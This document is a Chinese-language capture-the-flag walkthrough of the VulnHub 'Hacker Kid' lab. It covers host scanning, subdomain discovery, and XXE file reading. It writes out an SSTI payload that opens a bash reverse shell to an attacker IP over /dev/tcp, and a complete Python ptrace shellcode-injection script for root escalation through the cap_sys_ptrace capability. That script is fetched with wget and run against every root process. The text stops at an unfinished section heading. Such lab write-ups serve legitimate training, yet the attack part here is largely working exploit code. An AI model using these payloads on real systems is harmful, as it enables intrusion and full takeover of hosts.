Hacker_Kid(黑客小子，xxe,ssti,python2.7 Capability提权)

1.下载地址

Hacker kid: 1.0.1 ~ VulnHub

2.主机探测，端口扫描

nmap -sP 192.168.3.1/24 

nmap -A 192.168.3.138

3.发现80，9999两个web端口，访问192.168.3.138:80

4.发现网页出现提示，那我们就bp抓包去暴力破解

5.dig反向查询子域名

dig hackers.blackhat.local @192.168.3.138

vi /etc/hosts 

6.查看http://hackerkid.blackhat.local/

7.利用xxe漏洞查看/etc/passwd

我们现在不知道密码，可以试着查看这个saket账户的配置文件/home/saket/.bashrc

bbBase64 在线编码解码 | Base64 加密解密 - Base64.us

8.拿到账号密码登录http://192.168.3.156:9999/

9.利用ssti服务器模板注入反弹shell

Kila先打开监听端口

?name={% import os %}{{os.system('bash -c "bash -i > /dev/tcp/192.168.3.133/4567 0>&1 2>&1"')}}

在线url网址编码、解码器-BeJSON.com

%7B%25%20import%20os%20%25%7D%7B%7Bos.system('bash%20-c%20%22bash%20-i%20%3E%20%2Fde v%2Ftcp%2F192.168.3.133%2F4567%200%3E%261%202%3E%261%22')%7D%7D

10.python2.7提权(Capabilitiy能力提权)

/sbin/getcap -r / 2>/dev/null #递归地检查系统上所有文件的能力

利用python注入脚本提权

# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.

# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c



import ctypes

import sys

import struct



# Macros defined in <sys/ptrace.h>

# https://code.woboq.org/qt5/include/sys/ptrace.h.html



PTRACE_POKETEXT   = 4

PTRACE_GETREGS    = 12

PTRACE_SETREGS    = 13

PTRACE_ATTACH     = 16

PTRACE_DETACH     = 17



# Structure defined in <sys/user.h>

# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct



class user_regs_struct(ctypes.Structure):

    _fields_ = [

        ("r15", ctypes.c_ulonglong),

        ("r14", ctypes.c_ulonglong),

        ("r13", ctypes.c_ulonglong),

        ("r12", ctypes.c_ulonglong),

        ("rbp", ctypes.c_ulonglong),

        ("rbx", ctypes.c_ulonglong),

        ("r11", ctypes.c_ulonglong),

        ("r10", ctypes.c_ulonglong),

        ("r9", ctypes.c_ulonglong),

        ("r8", ctypes.c_ulonglong),

        ("rax", ctypes.c_ulonglong),

        ("rcx", ctypes.c_ulonglong),

        ("rdx", ctypes.c_ulonglong),

        ("rsi", ctypes.c_ulonglong),

        ("rdi", ctypes.c_ulonglong),

        ("orig_rax", ctypes.c_ulonglong),

        ("rip", ctypes.c_ulonglong),

        ("cs", ctypes.c_ulonglong),

        ("eflags", ctypes.c_ulonglong),

        ("rsp", ctypes.c_ulonglong),

        ("ss", ctypes.c_ulonglong),

        ("fs_base", ctypes.c_ulonglong),

        ("gs_base", ctypes.c_ulonglong),

        ("ds", ctypes.c_ulonglong),

        ("es", ctypes.c_ulonglong),

        ("fs", ctypes.c_ulonglong),

        ("gs", ctypes.c_ulonglong),

    ]



libc = ctypes.CDLL("libc.so.6")



pid=int(sys.argv[1])



# Define argument type and respone type.

libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]

libc.ptrace.restype = ctypes.c_uint64



# Attach to the process

libc.ptrace(PTRACE_ATTACH, pid, None, None)

registers=user_regs_struct()



# Retrieve the value stored in registers

libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))



print("Instruction Pointer: " + hex(registers.rip))



print("Injecting Shellcode at: " + hex(registers.rip))



# Shell code copied from exploit db.

shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"



# Inject the shellcode into the running process byte by byte.

for i in xrange(0,len(shellcode),4):

 

  # Convert the byte to little endian.

  shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)

  shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')

  shellcode_byte=int(shellcode_byte_little_endian,16)

 

  # Inject the byte.

  libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)



print("Shellcode Injected!!")



# Modify the instuction pointer

registers.rip=registers.rip+2



# Set the registers

libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))



print("Final Instruction Pointer: " + hex(registers.rip))



# Detach from the process.

libc.ptrace(PTRACE_DETACH, pid, None, None)

11.把代码放到靶机里,执行代码获取服务器root权限

python -m http.server 7654 //kali起一个网站

wget http://192.168.3.133:7654/pp.py //靶机下载脚本

nc 192.168.3.156 5600

for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 pp.py $i; done

#查找所有由 root 用户运行的进程，并对每个进程执行 pp.py 脚本，传递进程的 PID 作为参数

12.渗透测试叙述

我之前做渗透的时候，拿到一个虚拟机文件,进去后可以看到一个Ubuntu系统，但是没有账号密码。因为是虚拟机，用nmap -sP进行主机探测，再进行端口扫描(nmap -A IP)，发现三个端口，一个53是dns的端口，80、9999是web端口,我IP+端口进去查看，9999端口是一个账号密码登入界面，80端口是虚拟机介绍的页面，查看源码，发现代码里有注释掉的提示，提示了一个参数page_no，我用bp抓包暴力破解发现在page_no值等于21时返回长度不一样，返回结果有子域名hackers.blackhat.local，用dig去反向查询发现还有一个子域hackerkid.blackhat.local，把子域添加到/etc/hosts，进去发现是注册页面，账号，密码，用户名，邮箱等，我测试了一下发现有带回我输入的结果，我查看代码发现php代码里调用了一个xml...的参数，我怀疑它有xxe漏洞，构建了一个xxe漏洞尝试带出/etc/passwd，发现一个可用的账号saket，查看这个账号的配置文件(/home/saket/.bashrc)发现有注释的密码A，去9999端口页面输入账号密码，进入后提示输入我的名字，我在url中输入/?name=1发现返回hello 1，我突然想到了flask的ssti服务器模板注入，输入/？name={{9*9}}返回81，证明漏洞存在，那我就构建一个url编码的bash反弹命令，反弹成功拿到saket账号的控制权，我们还需要提权，查看系统上有能力的文件发现python2.7的cap_sys_ptrace+ep,这不就是python2.7的Capability提权，它允许我们以正在运行的root进程运行我们自己的进程,我们进程执行python注入脚本提权拿到服务器的root权限

13.xxe漏洞流量特征